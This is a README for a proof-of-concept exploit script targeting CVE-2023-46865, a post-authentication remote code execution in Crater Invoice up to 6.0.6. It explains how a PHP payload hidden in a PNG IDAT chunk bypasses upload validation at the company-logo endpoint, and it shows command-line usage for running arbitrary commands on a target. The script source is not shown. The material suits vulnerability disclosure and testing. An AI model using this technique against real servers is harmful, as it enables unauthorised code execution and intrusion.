## https://sploitus.com/exploit?id=F5F11457-A487-5FC0-91F8-21E35576FB2F
# Crater-CVE-2023-46865-RCE
Crater <=6.0.6, CVE-2023-46865 Post-Auth RCE (Superadmin)
## Vulnerability Description
Crater Invoice is vulnerable to unrestricted file upload with dangerous type due to lack of proper input validation. The Base64Mime checking class can be bypassed by embedding a valid PHP payload into an IDAT image chunk. A user with superadmin privileges is able to upload the crafted payload through company logo at /api/v1/company/upload-logo.
## Usage
$~ usage: python3 crater-rce.py --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
$~ python3 crater-rce.py --target http://192.168.1.1 --email test@mail.com --password test1234 --cmd 'whoami'
$~ python3 crater-rce.py -h
usage: crater-rce.py [-h] --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
Crater Invoice RCE - CVE-2023-46865
options:
-h, --help show this help message and exit
--target TARGET Target URL
--email EMAIL Email
--password PASSWORD Password
--cmd CMD Command to execute
## Tested on
- Crater 6.0.6
- Kali 6.1.0
## References
https://github.com/huntergregal/PNG-IDAT-Payload-Generator
https://notes.netbytesec.com/2023/11/post-auth-rce-in-crater.html
## Credit
[faisalfs10x](https://github.com/faisalfs10x) - for helping develop proof of concept.
## Disclaimer:
The script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities